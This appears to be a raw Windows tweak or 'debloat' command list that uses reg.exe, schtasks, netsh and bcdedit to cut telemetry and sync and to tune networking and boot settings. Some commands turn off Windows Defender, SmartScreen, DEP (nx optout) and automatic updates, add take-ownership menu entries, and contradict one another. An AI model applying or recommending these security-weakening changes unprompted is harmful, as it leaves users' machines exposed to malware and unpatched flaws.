Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync" /v "SyncPolicy" /t REG_DWORD /d "5" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Personalization" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\BrowserSettings" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Credentials" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Language" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Accessibility" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Windows" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableWindowsLocationProvider" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableLocationScripting" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Sensor\Permissions\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "SystemSettingsDownloadMode" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Speech" /v "AllowSpeechModelUpdate" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgrade" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgradePeriod" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpdatePeriod" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsStore\WindowsUpdate" /v "AutoDownload" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\7971f918-a847-4430-9279-4a52d1efe18d" /v "RegisteredWithAU" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\OneDrive" /v "PreventNetworkTrafficPreUserSignIn" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BingSearchEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Application Experience\StartupAppTask"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Application Experience\StartupAppTask" /disable"

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyUpload"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyUpload" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Autochk\Proxy"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Autochk\Proxy" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Maintenance\WinSAT"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Maintenance\WinSAT" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Application Experience\AitAgent"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Application Experience\AitAgent" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\DiskFootprint\Diagnostics"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\DiskFootprint\Diagnostics" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\PI\Sqm-Tasks"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\PI\Sqm-Tasks" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\AppID\SmartScreenSpecific"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\AppID\SmartScreenSpecific" /disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SettingSync\BackgroundUploadTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /Disable schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ApplicationData\CleanupTemporaryState" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ApplicationData\DsSvcCleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\HypervisorFlightingTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Diagnosis\Scheduled" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\File Classification Infrastructure\Property Definition Sync" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Management\Provisioning\Logon" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Multimedia\SystemSoundsService" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\NlaSvc\WiFiTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\NetTrace\GatherNetworkInfo" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Offline Files\Background Synchronization" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Offline Files\Logon Synchronization" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Ras\MobilityManager" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Servicing\StartComponentCleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SettingSync\BackupTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SettingSync\NetworkStateChangeTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceAgentTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceManagerTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\User Profile Service\HiveUploadTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\WCM\WiFiTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Media Sharing\UpdateLibrary" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Wininet\CacheTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Maintenance Work" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Workplace Join\Automatic-Device-Join" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTaskLogon" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Driver Easy Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Office\Office ClickToRun Service Monitor" /Disable

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\netsh.exe

netsh int tcp set global rss=enable

C:\Windows\system32\netsh.exe

netsh int tcp set global autotuninglevel=normal

C:\Windows\system32\netsh.exe

netsh int tcp set global ecncapability=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global timestamps=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global initialrto=2000

C:\Windows\system32\netsh.exe

netsh int tcp set global maxsynretransmissions=2

C:\Windows\system32\netsh.exe

netsh int tcp set global rsc=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global nonsackrttresiliency=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global fastopen=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global fastopenfallback=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global hystart=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global pacingprofile=off

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick yes

C:\Windows\system32\bcdedit.exe

bcdedit /timeout 0

C:\Windows\system32\bcdedit.exe

bcdedit /set nx optout

C:\Windows\system32\bcdedit.exe

bcdedit /set bootux disabled

C:\Windows\system32\bcdedit.exe

bcdedit /set bootmenupolicy standard

C:\Windows\system32\bcdedit.exe

bcdedit /set hypervisorlaunchtype off

C:\Windows\system32\bcdedit.exe

bcdedit /set tpmbootentropy ForceDisable

C:\Windows\system32\bcdedit.exe

bcdedit /set quietboot yes

C:\Windows\system32\bcdedit.exe

bcdedit /set {globalsettings} custom:16000067 true

C:\Windows\system32\bcdedit.exe

bcdedit /set {globalsettings} custom:16000069 true

C:\Windows\system32\bcdedit.exe

bcdedit /set {globalsettings} custom:16000068 true

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\netsh.exe

netsh interface teredo set state disabled

C:\Windows\system32\netsh.exe

netsh interface 6to4 set state disabled

C:\Windows\system32\netsh.exe

netsh winsock reset

C:\Windows\system32\netsh.exe

netsh int isatap set state disable

C:\Windows\system32\netsh.exe

netsh int ip set global taskoffload=disabled

C:\Windows\system32\netsh.exe

netsh int ip set global neighborcachelimit=4096

C:\Windows\system32\netsh.exe

netsh int tcp set global timestamps=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set heuristics disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global autotuninglevel=disable

C:\Windows\system32\netsh.exe

netsh int tcp set global chimney=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global ecncapability=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global rss=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global rsc=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global dca=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global netdma=enabled

C:\Windows\system32\netsh.exe

